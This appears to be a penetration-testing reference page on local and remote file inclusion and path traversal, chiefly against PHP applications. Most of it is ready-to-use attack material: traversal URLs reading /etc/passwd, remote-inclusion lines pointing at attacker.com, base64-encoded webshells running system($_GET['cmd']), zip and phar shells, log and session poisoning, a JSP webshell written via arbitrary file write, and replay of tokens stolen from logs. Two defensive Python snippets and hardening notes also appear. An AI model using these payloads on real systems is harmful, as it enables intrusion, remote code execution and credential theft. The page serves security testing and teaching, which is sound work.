File Inclusion/Path traversal

File Inclusion

Remote File Inclusion (RFI): The file is loaded from a remote server (best case: you can write the code and the server will execute it). In PHP this is disabled by default (allow_url_include).
Local File Inclusion (LFI): The server loads a local file.

The vulnerability occurs when the user can control in some way the file that is going to be loaded by the server.

Vulnerable PHP functions: require, require_once, include, include_once

A good tool to exploit this vulnerability: https://github.com/kurobeats/fimap

Blind - Interesting - LFI2RCE files

wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../../FUZZ

Linux

Mixing several *nix LFI lists and adding more paths, I created this one:

Auto_Wordlists/wordlists/file_inclusion_linux.txt at main · carlospolop/Auto_Wordlists · GitHub

Also try changing / for \
Also try adding ../../../../../

A list that uses several techniques to find the file /etc/passwd (to check if the vulnerability exists) can be found here

Windows

Merge of different wordlists:

Auto_Wordlists/wordlists/file_inclusion_windows.txt at main · carlospolop/Auto_Wordlists · GitHub

Also try changing / for \
Also try removing C:/ and adding ../../../../../

A list that uses several techniques to find the file /boot.ini (to check if the vulnerability exists) can be found here

OS X

Check the LFI list of Linux.

Basic LFI and bypasses

All the examples are for Local File Inclusion but could be applied to Remote File Inclusion too (page=http://myserver.com/phpshellcode.txt).

http://example.com/index.php?page=../../../etc/passwd

traversal sequences stripped non-recursively

http://example.com/index.php?page=....//....//....//etc/passwd
http://example.com/index.php?page=....\/....\/....\/etc/passwd
http://some.domain.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd

Null byte (%00)

Bypass the append of more chars at the end of the provided string (bypass of: $_GET['param']."php")

http://example.com/index.php?page=../../../etc/passwd%00

This is solved since PHP 5.4

Encoding

You could use non-standard encodings like double URL encode (and others):

http://example.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
http://example.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00

HTML-to-PDF SVG/IMG path traversal

Modern HTML-to-PDF engines (e.g. TCPDF or wrappers such as html2pdf) happily parse attacker-supplied HTML, SVG, CSS and font URLs, yet run inside trusted backend networks with filesystem access. Once you can inject HTML into $pdf->writeHTML()/Html2Pdf::writeHTML(), you can frequently exfiltrate local files that the web server account can read.

  • Fingerprint the renderer: every generated PDF has a Producer field (e.g. TCPDF 6.8.2). Knowing the exact build tells you which path filters exist and whether URL decoding happens before validation.
  • Inline SVG payloads: TCPDF::startSVGElementHandler() reads the xlink:href attribute from <image> elements before running urldecode(). Embedding a malicious SVG inside a data URI makes most HTML sanitisers ignore the payload while TCPDF still parses it:
<img src="data:image/svg+xml;base64,PHN2ZyB2aWV3Qm94PSIwIDAgMCAwIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxpbWFnZSB4bGluazpocmVmPSIuLi8uLi8uLi8uLi8uLi90bXAvdXNlcl9maWxlcy91c2VyXzEvcHJpdmF0ZV9pbWFnZS5wbmciIGhlaWdodD0iMTAwJSIgd2lkdGg9IjEwMCUiLz48L3N2Zz4=" />

TCPDF prepends $_SERVER['DOCUMENT_ROOT'] to paths beginning with / and only later resolves .., so use either leading ../../.. segments or /../../.. to escape the root after the prepend.

  • Encoding to bypass naive filters: Versions ≤6.8.2 only check for the literal substring ../ before decoding the URL. Sending ..%2f (or ..%2F) in the SVG or in a raw <img src> attribute bypasses the check, because the traversal dot-dot-slash sequence is recreated only after TCPDF calls urldecode().
  • Double-encoding for multi-stage decoding: If user input is decoded by the web framework and by TCPDF, double-encode the slash (%252f). One decode turns it into %2f, the second decode in TCPDF turns it into /, yielding /..%252f../../../../… without ever showing ../ to the early filter.
  • HTML <img> handler: TCPDF::openHTMLTagHandler() contains the same order-of-operations bug, allowing direct HTML payloads such as src="%2f..%252f..%252ftmp%252fsecret.png" to read any locally reachable bitmap.

This technique leaks anything readable by the PDF worker (passport scans, API keys rendered as images, etc.). The maintainers fixed the issue in 6.9.1 by canonicalising paths (isRelativePath()), so when testing prefer older Producer versions.

From existent folder

Maybe the back-end is checking the folder path:

http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd

Exploring File System Directories on a Server

The file system of a server can be explored recursively to identify directories, not just files, by employing certain techniques. This process involves determining the directory depth and probing for the existence of specific folders. Below is a detailed method to achieve this:

  1. Identify Directory Depth: Determine the depth of your current directory by successfully fetching the /etc/passwd file (applicable if the server is Linux-based). An example URL might be structured as follows, indicating a depth of three:
http://example.com/index.php?page=../../../etc/passwd # depth of 3
  2. Probe for Folders: Append the name of the suspected folder (e.g., private) to the URL, then navigate back to /etc/passwd. The additional directory level requires incrementing the depth by one:
http://example.com/index.php?page=private/../../../../etc/passwd # depth of 3+1=4
  3. Interpret the Outcomes: The server's response indicates whether the folder exists:
     • Error / No Output: The folder private likely does not exist at the specified location.
     • Contents of /etc/passwd: The presence of the private folder is confirmed.
  4. Recursive Exploration: Discovered folders can be further probed for subdirectories or files using the same technique or traditional Local File Inclusion (LFI) methods.

To explore directories at different locations in the file system, adjust the payload accordingly. For instance, to check if /var/www/ contains a private directory (assuming the current directory is at a depth of 3), use:

http://example.com/index.php?page=../../../var/www/private/../../../etc/passwd

Path Truncation Technique

Path truncation is a method employed to manipulate file paths in web applications. It's often used to access restricted files by bypassing certain security measures that append additional characters to the end of file paths. The goal is to craft a file path that, once altered by the security measure, still points to the desired file.

In PHP, various representations of a file path can be considered equivalent due to the nature of the file system. For instance:

  • /etc/passwd, /etc//passwd, /etc/./passwd, and /etc/passwd/ are all treated as the same path.
  • When the last 6 characters are passwd, appending a / (making it passwd/) doesn’t change the targeted file.
  • Similarly, if .php is appended to a file path (like shellcode.php), adding a /. at the end will not alter the file being accessed.

The provided examples demonstrate how to utilise path truncation to access /etc/passwd, a common target due to its sensitive content (user account information):

http://example.com/index.php?page=a/../../../../../../../../../etc/passwd......[ADD MORE]....
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././.
http://example.com/index.php?page=a/./.[ADD MORE]/etc/passwd
http://example.com/index.php?page=a/../../../../[ADD MORE]../../../../../etc/passwd

In these scenarios, the number of traversals needed might be around 2027, but this number can vary based on the server's configuration.

  • Using Dot Segments and Additional Characters: Traversal sequences (../), combined with extra dot segments and characters, can be used to navigate the file system, effectively ignoring strings appended by the server.
  • Determining the Required Number of Traversals: Through trial and error, one can find the precise number of ../ sequences needed to navigate to the root directory and then to /etc/passwd, ensuring that any appended strings (like .php) are neutralised while the desired path (/etc/passwd) remains intact.
  • Starting with a Fake Directory: It's a common practice to begin the path with a non-existent directory (like a/). This technique is used as a precautionary measure or to fulfil the requirements of the server's path parsing logic.

When employing path truncation techniques, it's crucial to understand the server's path parsing behaviour and filesystem structure. Each scenario might require a different approach, and testing is often necessary to find the most effective method.

This vulnerability was corrected in PHP 5.3.

Filter bypass tricks

http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
Maintain the initial path: http://example.com/index.php?page=/var/www/../../etc/passwd
http://example.com/index.php?page=PhP://filter

Remote File Inclusion

In PHP this is disabled by default because allow_url_include is Off. It needs to be On for it to work, and in that case you could include a PHP file from your server and get RCE:

http://example.com/index.php?page=http://attacker.com/mal.php
http://example.com/index.php?page=\\attacker.com\shared\mal.php

If for some reason allow_url_include is On, but PHP is filtering access to external webpages, according to this post, you could use for example the data protocol with base64 to decode a b64 PHP code and get RCE:

PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.txt

Exposed .git Repository (Source Disclosure)

If a web server exposes /.git/, an attacker can often reconstruct the entire repository (including commit history) and review the application offline. This commonly reveals hidden endpoints, secrets, SQL queries, and admin-only functionality.

Quick checks:

curl -s -i http://TARGET/.git/HEAD
curl -s -i http://TARGET/.git/config

Dump the repository with git-dumper:

uv tool install git-dumper
git-dumper http://TARGET/.git/ out/

Then restore the working tree:

cd out
git checkout .

Tip

In the previous code, the final +.txt was added because the attacker needed a string that ended in .txt, so the string ends with it and after the b64 decode that part will return just junk and the real PHP code will be included (and therefore, executed).

Another example not using the php:// protocol would be:

data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+txt

Python Root element

In Python, in code like this one:

# file_name is controlled by a user
os.path.join(os.getcwd(), "public", file_name)

If the user passes an absolute path to file_name, the previous path is just removed:

os.path.join(os.getcwd(), "public", "/etc/passwd")
'/etc/passwd'

This is the intended behaviour according to the docs:

If a component is an absolute path, all previous components are thrown away and joining continues from the absolute path component.
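The following added example (not part of the original page) shows the os.path.join behaviour quoted above beside a hardened join that rejects absolute paths and drive letters up front, resolves the candidate with os.path.realpath and verifies with os.path.commonpath that it is still under the allow-listed base, which is the canonicalise-and-allow-list check the hardening notes in the arbitrary-file-write section of this page ask for. The base directory /srv/app is an assumed placeholder; it does not need to exist.

```python
import os
import re

# Assumed base directory; any path works because realpath() also normalises
# components that do not exist on disk.
BASE = "/srv/app"


def unsafe_join(base: str, file_name: str) -> str:
    """The pattern quoted above: os.path.join discards every earlier component
    as soon as it meets an absolute path."""
    return os.path.join(base, "public", file_name)


def safe_join(base: str, file_name: str) -> str:
    """Return the resolved path for file_name under base/public, or raise ValueError."""
    root = os.path.realpath(os.path.join(base, "public"))
    if "\x00" in file_name:
        raise ValueError("null byte in file name")
    # os.path.join would drop `root` for these, so refuse them before joining.
    if (os.path.isabs(file_name) or re.match(r"^[A-Za-z]:", file_name)
            or file_name.startswith("\\")):
        raise ValueError("absolute path or drive letter rejected")
    # Canonicalise: collapses '.', '..' and duplicate slashes, and resolves symlinks for the
    # components that exist, so a symlink inside public/ that points outside is caught too.
    candidate = os.path.realpath(os.path.join(root, file_name))
    # commonpath compares whole components, so '/srv/app/public_old' does not pass
    # as a child of '/srv/app/public' the way a plain startswith() check would allow.
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError("path escapes the allow-listed directory")
    return candidate


def probe(file_name: str, base: str = BASE) -> str:
    """Describe what safe_join does with one user-supplied name."""
    try:
        return "allowed:" + safe_join(base, file_name)
    except ValueError as exc:
        return "rejected:" + str(exc)


if __name__ == "__main__":
    print(unsafe_join(BASE, "/etc/passwd"))  # the join silently yields /etc/passwd
    for name in ["index.html", "css/../index.html", "/etc/passwd",
                 "../../etc/passwd", "../public_old/x", "a\x00.png"]:
        print(f"{name!r:22} {probe(name)}")
```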

Java List Directories

It looks like if you have a Path Traversal in Java and you ask for a directory instead of a file, a listing of the directory is returned. This won't happen in other languages (afaik).

Top 25 parameters

Here's a list of the top 25 parameters that could be vulnerable to local file inclusion (LFI) vulnerabilities (from link):

?cat={payload}
?dir={payload}
?action={payload}
?board={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?prefix={payload}
?include={payload}
?page={payload}
?inc={payload}
?locate={payload}
?show={payload}
?doc={payload}
?site={payload}
?type={payload}
?view={payload}
?content={payload}
?document={payload}
?layout={payload}
?mod={payload}
?conf={payload}

LFI / RFI using PHP wrappers & protocols

php://filter

PHP filters allow performing basic modification operations on the data before it's read or written. There are 5 categories of filters:

  • String Filters:
    • string.rot13
    • string.toupper
    • string.tolower
    • string.strip_tags: Remove tags from the data (everything between "<" and ">" chars)
    • Note that this filter has disappeared from modern versions of PHP
  • Conversion Filters
    • convert.base64-encode
    • convert.base64-decode
    • convert.quoted-printable-encode
    • convert.quoted-printable-decode
    • convert.iconv.* : Transforms to a different encoding (convert.iconv.<input_enc>.<output_enc>). To get the list of all the encodings supported run in the console: iconv -l

Warning

Abusing the convert.iconv.* conversion filter you can generate arbitrary text, which could be useful to write arbitrary text or make a function like include process arbitrary text. For more info check LFI2RCE via php filters.

  • Compression Filters
    • zlib.deflate: Compress the content (useful if exfiltrating a lot of info)
    • zlib.inflate: Decompress the data
  • Encryption Filters
    • mcrypt.* : Deprecated
    • mdecrypt.* : Deprecated
  • Other Filters
    • Running in php var_dump(stream_get_filters()); you can find a couple of unexpected filters:
      • consumed
      • dechunk: reverses HTTP chunked encoding
      • convert.*

# String Filters
## Chain string.toupper, string.rot13 and string.tolower reading /etc/passwd
echo file_get_contents("php://filter/read=string.toupper|string.rot13|string.tolower/resource=file:///etc/passwd");
## Same chain without the "|" char
echo file_get_contents("php://filter/string.toupper/string.rot13/string.tolower/resource=file:///etc/passwd");
## string.strip_tags example
echo file_get_contents("php://filter/string.strip_tags/resource=data://text/plain,<b>Bold</b><?php php code; ?>lalalala");

# Conversion filter
## B64 decode
echo file_get_contents("php://filter/convert.base64-decode/resource=data://plain/text,aGVsbG8=");
## Chain B64 encode and decode
echo file_get_contents("php://filter/convert.base64-encode|convert.base64-decode/resource=file:///etc/passwd");
## convert.quoted-printable-encode example
echo file_get_contents("php://filter/convert.quoted-printable-encode/resource=data://plain/text,£hellooo=");
=C2=A3hellooo=3D
## convert.iconv.utf-8.utf-16le
echo file_get_contents("php://filter/convert.iconv.utf-8.utf-16le/resource=data://plain/text,trololohellooo=");

# Compression Filter
## Compress + B64
echo file_get_contents("php://filter/zlib.deflate/convert.base64-encode/resource=file:///etc/passwd");
readfile('php://filter/zlib.inflate/resource=test.deflated'); # To decompress the data locally
# note that the PHP protocol is case-insensitive (that means you can use "PhP://" and any other variant)

Warning

The "php://filter" part is case insensitive

Using php filters as oracle to read arbitrary files

In this post a technique is proposed to read a local file without having the output returned from the server. This technique is based on a boolean exfiltration of the file (char by char) using php filters as an oracle. This works because php filters can be used to make a text big enough to make php throw an exception.

In the original post you can find a detailed explanation of the technique, but here is a quick summary:

  • Use the codec UCS-4LE to leave the leading character of the text at the beginning and make the size of the string increase exponentially.
  • This will be used to generate a text so big when the initial letter is guessed correctly that php will trigger an error.
  • The dechunk filter will remove everything if the first char is not a hexadecimal, so we can know if the first char is hex.
  • This, combined with the previous one (and other filters depending on the guessed letter), will allow us to guess a letter at the beginning of the text by seeing when we do enough transformations to make it not a hexadecimal character. Because if it is hex, dechunk won't delete it and the initial bomb will make php error.
  • The codec convert.iconv.UNICODE.CP930 transforms every letter into the following one (so after this codec: a -> b). This allows us to discover if the first letter is an a, for example, because if we apply this codec 6 times a->b->c->d->e->f->g the letter is no longer a hexadecimal character, therefore dechunk doesn't delete it and the php error is triggered because it multiplies with the initial bomb.
  • Using other transformations like rot13 at the beginning it's possible to leak other chars like n, o, p, q, r (and other codecs can be used to move other letters into the hex range).
  • When the initial char is a number it's needed to base64 encode it and leak the 2 first letters to leak the number.
  • The final problem is to see how to leak more than the initial letter. By using order memory filters like convert.iconv.UTF16.UTF-16BE, convert.iconv.UCS-4.UCS-4LE, convert.iconv.UCS-4.UCS-4LE it's possible to change the order of the chars and get in the first position other letters of the text.
  • And in order to be able to obtain further data the idea is to generate 2 bytes of junk data at the beginning with convert.iconv.UTF16.UTF16, apply UCS-4LE to make it pivot with the next 2 bytes, and delete the data until the junk data (this will remove the first 2 bytes of the initial text). Continue doing this until you reach the desired bit to leak.

In the post a tool to perform this automatically was also released: php_filters_chain_oracle_exploit.

php://fd

This wrapper allows access to file descriptors that the process has open. Potentially useful to exfiltrate the content of opened files:

echo file_get_contents("php://fd/3");
$myfile = fopen("/etc/passwd", "r");

You can also use php://stdin, php://stdout and php://stderr to access the file descriptors 0, 1 and 2 respectively (not sure how this could be useful in an attack)

zip:// and rar://

Upload a Zip or Rar file with a PHPShell inside and access it.
To be able to use the rar protocol it needs to be activated specifically.

echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php

http://example.com/index.php?page=zip://shell.jpg%23payload.php

# To compress with rar
rar a payload.rar payload.php;
mv payload.rar shell.jpg;
rm payload.php
http://example.com/index.php?page=rar://shell.jpg%23payload.php

data://

http://example.net/?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://example.net/?page=data://text/plain,<?php phpinfo(); ?>
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
http://example.net/?page=data:text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://example.net/?page=data:text/plain,<?php phpinfo(); ?>
http://example.net/?page=data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"

Note that this protocol is restricted by the php configurations allow_url_open and allow_url_include

expect://

Expect has to be activated. You can execute code using this:

http://example.com/index.php?page=expect://id
http://example.com/index.php?page=expect://ls

input://

Specify your payload in the POST parameters:

curl -XPOST "http://example.com/index.php?page=php://input" --data "<?php system('id'); ?>"

phar://

A .phar file can be utilised to execute PHP code when a web application leverages functions such as include for file loading. The PHP code snippet provided below demonstrates the creation of a .phar file:

<?php
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub('<?php __HALT_COMPILER(); system("ls"); ?>');
$phar->stopBuffering();

To compile the .phar file, the following command should be executed:

php --define phar.readonly=0 create_path.php

Upon execution, a file named test.phar will be created, which could potentially be leveraged to exploit Local File Inclusion (LFI) vulnerabilities.

In cases where the LFI only performs file reading without executing the PHP code within, through functions such as file_get_contents(), fopen(), file(), file_exists(), md5_file(), filemtime(), or filesize(), exploitation of a deserialization vulnerability could be attempted. This vulnerability is associated with the reading of files using the phar protocol.

For a detailed understanding of exploiting deserialization vulnerabilities in the context of .phar files, refer to the document linked below:

Phar Deserialization Exploitation Guide

phar:// deserialization

CVE-2024-2961

It was possible to abuse any arbitrary file read from PHP that supports php filters to get a RCE. The detailed description can be found in this post.
Very quick summary: a 3 byte overflow in the PHP heap was abused to alter the chain of free chunks of a specific size in order to be able to write anything in any address, so a hook was added to call system.
It was possible to alloc chunks of specific sizes abusing more php filters.

More protocols

Check the protocols to include here:

  • php://memory and php://temp — Write in memory or in a temporary file (not sure how this can be useful in a file inclusion attack)
  • file:// — Accessing the local filesystem
  • http:// — Accessing HTTP(s) URLs
  • ftp:// — Accessing FTP(s) URLs
  • zlib:// — Compression Streams
  • glob:// — Find pathnames matching a pattern (it doesn't return anything printable, so not really useful here)
  • ssh2:// — Secure Shell 2
  • ogg:// — Audio streams (not useful to read arbitrary files)

LFI via PHP’s ‘assert’

Local File Inclusion (LFI) risks in PHP are notably high when dealing with the 'assert' function, which can execute code within strings. This is particularly problematic if input containing directory traversal characters like ".." is checked but not properly sanitised.

For example, PHP code might be designed to prevent directory traversal like so:

assert("strpos('$file', '..') === false") or die("");

While this aims to stop traversal, it inadvertently creates a vector for code injection. To exploit this for reading file contents, an attacker could use:

' and die(highlight_file('/etc/passwd')) or '

Similarly, for executing arbitrary system commands, one might use:

' and die(system("id")) or '

It's important to URL-encode these payloads.

PHP Blind Path Traversal

Warning

This technique is relevant in cases where you control the file path of a PHP function that will access a file but you won't see the content of the file (like a simple call to file()) because the content isn't shown.

In this incredible post it's explained how a blind path traversal can be abused via PHP filters to exfiltrate the content of a file via an error oracle.

As a summary, the technique uses the "UCS-4LE" encoding to make the content of the file so big that the PHP function opening the file will trigger an error.

Then, in order to leak the first char, the filter dechunk is used along with others such as base64 or rot13, and finally the filters convert.iconv.UCS-4.UCS-4LE and convert.iconv.UTF16.UTF-16BE are used to place other chars at the beginning and leak them.

Functions that might be vulnerable: file_get_contents, readfile, finfo->file, getimagesize, md5_file, sha1_file, hash_file, file, parse_ini_file, copy, file_put_contents (only target read only with this), stream_get_contents, fgets, fread, fgetc, fgetcsv, fpassthru, fputs

For the technical details check the mentioned post!

LFI2RCE

Arbitrary File Write via Path Traversal (Webshell RCE)

When server-side code that receives/uploads files builds the destination path using user-controlled data (e.g., the filename or a URL) without canonicalising and validating it, .. segments and absolute paths can escape the intended directory and cause an arbitrary file write. If you can place the payload under a web-exposed directory, you usually get unauthenticated RCE by dropping a webshell.

Typical exploitation workflow:

  • Identify the write primitive in the endpoint or background worker that accepts paths/filenames and writes content to disk (e.g., message-driven ingestion, XML/JSON command handlers, ZIP extractors, etc.).
  • Determine web-exposed directories. Common examples:
    • Apache/PHP: /var/www/html/
    • Tomcat/Jetty: <tomcat>/webapps/ROOT/ → drop shell.jsp
    • IIS: C:\inetpub\wwwroot\ → drop shell.aspx
  • Craft a traversal path that breaks out of the intended storage directory into the webroot, and include your webshell content.
  • Browse to the dropped payload and execute commands.

Notes:

  • The vulnerable service performing the write may listen on a non-HTTP port (e.g., a JMF XML listener on TCP 4004). The main web portal (different port) will later serve your payload.
  • On Java stacks, these file writes are typically implemented with simple File/Paths concatenation. Lack of canonicalisation/allow-listing is the core issue.

Generic XML/JMF-style example (product schemas vary – the DOCTYPE/body wrapper is irrelevant for the traversal):

<?xml version="1.0" encoding="UTF-8"?>
<JMF SenderID="hacktricks" Version="1.3">
  <Command Type="SubmitQueueEntry">
    <!-- Write outside the intake folder into the webroot via traversal -->
    <Resource Name="FileName">../../../webapps/ROOT/shell.jsp</Resource>
    <Data>
      <![CDATA[
      <%@ page import="java.io.*" %>
      <%
        String c = request.getParameter("cmd");
        if (c != null) {
          Process p = Runtime.getRuntime().exec(c);
          try (var in = p.getInputStream(); var out = response.getOutputStream()) {
            in.transferTo(out);
          }
        }
      %>
      ]]>
    </Data>
  </Command>
</JMF>

Hardening that defeats this class of bugs:

  • Resolve to a canonical path and ensure it's a descendant of an allow-listed base directory.
  • Reject any path containing .., absolute roots, or drive letters; prefer generated filenames.
  • Run the writer as a low-privilege account and segregate write directories from served roots.

Remote File Inclusion

Explained previously, follow this link.

Via Apache/Nginx log file

If the Apache or Nginx server is vulnerable to LFI inside the include function you could try to access /var/log/apache2/access.log or /var/log/nginx/access.log, set inside the User-Agent or inside a GET parameter a php shell like <?php system($_GET['c']); ?> and include that file

Warning

Note that if you use double quotes for the shell instead of simple quotes, the double quotes will be modified to the string "quote;", PHP will throw an error there and nothing else will be executed.

Also, make sure you write the payload correctly or PHP will error every time it tries to load the log file and you won't have a second opportunity.

This could also be done in other logs but be careful, the code inside the logs could be URL encoded and this could destroy the Shell. The "basic" authorisation header contains "user:password" in Base64 and it is decoded inside the logs. The PHPShell could be inserted inside this header.
Other possible log paths:

/var/log/apache2/access.log
/var/log/apache/access.log
/var/log/apache2/error.log
/var/log/apache/error.log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/error_log

Fuzzing wordlist: https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI

Read access logs to harvest GET-based auth tokens (token replay)

Many apps mistakenly accept session/auth tokens via GET (e.g., AuthenticationToken, token, sid). If you have a path traversal/LFI primitive to the web server logs, you can steal those tokens from the access logs and replay them to completely bypass authentication.

How-to:

  • Use the traversal/LFI to read the web server access log. Common locations:
    • /var/log/apache2/access.log, /var/log/httpd/access_log
    • /var/log/nginx/access.log
  • Some endpoints return file reads Base64-encoded. If so, decode on your machine and inspect the log lines.
  • Grep for GET requests that include the token parameter and grab its value, then replay against the application entry point.

Example flow (generic):

GET /vuln/asset?name=..%2f..%2f..%2f..%2fvar%2flog%2fapache2%2faccess.log HTTP/1.1
Host: target

Decode the body if it is Base64, then replay the recorded token:

GET /portalhome/?AuthenticationToken=<stolen_token> HTTP/1.1
Host: target

Notes:

  • Tokens in URLs are logged by default; never accept bearer tokens via GET in production systems.
  • If the app supports multiple token names, search for common keys like AuthenticationToken, token, sid, access_token.
  • Rotate any tokens that may have leaked into logs.
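As the defender-side counterpart to the log-poisoning and token-harvesting techniques in the two sections above, the following added example (not part of the original page) parses access-log lines in the Apache/Nginx combined format, flags requests that carry one of the token parameter names listed above in the query string or a PHP open tag in the request target, referer or User-Agent, and redacts the token values before the line is stored or shared. The log lines and the token value are constructed sample data.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Query keys this page lists as commonly (mis)used for GET-based authentication.
TOKEN_KEYS = {"authenticationtoken", "token", "sid", "access_token"}

# Apache/Nginx "combined" log format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)


def _line(ip, target, ua, status="200"):
    """Build a constructed combined-format log line (sample data, not a real log)."""
    return f'{ip} - - [01/Jan/2024:10:00:00 +0000] "GET {target} HTTP/1.1" {status} 512 "-" "{ua}"'


LOG_LINES = [
    _line("10.0.0.5", "/portalhome/?AuthenticationToken=c0ffee11deadbeef", "Mozilla/5.0"),
    _line("10.0.0.7", "/index.php?page=..%2f..%2fvar%2flog%2fapache2%2faccess.log",
          "<?php system($_GET['c']); ?>"),
    _line("10.0.0.9", "/about", "curl/8.0"),
]


def parse_line(line: str):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def find_query_tokens(target: str):
    """(key, value) pairs in the query string whose key is a known token name."""
    query = urlsplit(target).query
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if k.lower() in TOKEN_KEYS]


def find_php_tags(entry: dict):
    """Names of the logged fields that carry a PHP open tag (a log-poisoning attempt)."""
    fields = {"request": unquote(entry["target"]), "referer": entry["referer"],
              "user-agent": entry["ua"]}
    return [name for name, text in fields.items() if PHP_TAG_RE.search(text)]


def redact(line: str) -> str:
    """Replace token values so the line can be stored or shared without the secret."""
    entry = parse_line(line)
    if not entry:
        return line
    for key, _ in find_query_tokens(entry["target"]):
        # Substitute on the raw line so percent-encoded values are covered as well.
        line = re.sub(rf"({re.escape(key)}=)[^&\s\"]*", r"\1[REDACTED]", line,
                      flags=re.IGNORECASE)
    return line


def triage(lines):
    """One finding dict per issue: a token exposed in a URL, or a PHP tag in a logged field."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if not entry:
            continue
        for key, _ in find_query_tokens(entry["target"]):
            findings.append({"ip": entry["ip"], "kind": "token-in-url", "detail": key})
        for field in find_php_tags(entry):
            findings.append({"ip": entry["ip"], "kind": "php-tag-in-" + field, "detail": field})
    return findings


if __name__ == "__main__":
    for finding in triage(LOG_LINES):
        print(finding)
    print(redact(LOG_LINES[0]))
```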

Via Email

Send a mail to an internal account (user@localhost) containing your PHP payload like <?php echo system($_REQUEST["cmd"]); ?> and try to include it in the mail of the user with a path like /var/mail/<USERNAME> or /var/spool/mail/<USERNAME>

Via /proc/*/fd/

  1. Upload a lot of shells (for example: 100)
  2. Include http://example.com/index.php?page=/proc/$PID/fd/$FD, with $PID = PID of the process (can be brute forced) and $FD the file descriptor (can be brute forced too)

Via /proc/self/environ

Like a log file, send the payload in the User-Agent; it will be reflected inside the /proc/self/environ file

GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?>

Via upload

If you can upload a file, just inject the shell payload in it (e.g.: <?php system($_GET['c']); ?>).

http://example.com/index.php?page=path/to/uploaded/file.png

In order to keep the file legible it is best to inject into the metadata of the pictures/doc/pdf

Via Zip file upload

Upload a ZIP file containing a PHP shell compressed and access:

example.com/page.php?file=zip://path/to/zip/hello.zip%23rce.php

Via PHP sessions

Check if the website uses PHP Session (PHPSESSID)

Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly

In PHP these sessions are stored into /var/lib/php5/sess_[PHPSESSID] files

/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";

Set the cookie to <?php system('cat /etc/passwd');?>

login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php

Use the LFI to include the PHP session file

login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm2

Kupitia ssh

Ikiwa ssh iko hai, angalia ni mtumiaji gani anayetumika (/proc/self/status & /etc/passwd) na jaribu kufikia <HOME>/.ssh/id_rsa

Via vsftpd logs

The logs of the vsftpd FTP server are stored in /var/log/vsftpd.log. In a scenario where a Local File Inclusion (LFI) vulnerability exists and an exposed vsftpd server is reachable, the following steps can be considered:

  1. Inject a PHP payload into the username field during the login process (the username is written to the log even when the login fails).
  2. After the injection, use the LFI to retrieve the server logs from /var/log/vsftpd.log; this only works if the web server user can read that file.

Via php base64 filter (using base64)

As shown in this article, the PHP base64 filter simply ignores non-base64 characters. You can use that to bypass a file-extension check: if you supply base64 that ends in ".php", the filter ignores the "." and treats "php" as three more base64 characters appended to the data (they decode to a couple of junk bytes after the closing ?>, which is harmless). Example payload:

http://example.com/index.php?page=PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.php

NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>" (the blob above decodes to that followed by one stray >, which is just output)

Via php filters (no file needed)

This writeup explains that you can chain php filters to generate arbitrary content as output, which means you can produce arbitrary PHP code for the include without needing to write it into a file first.

LFI2RCE via PHP Filters

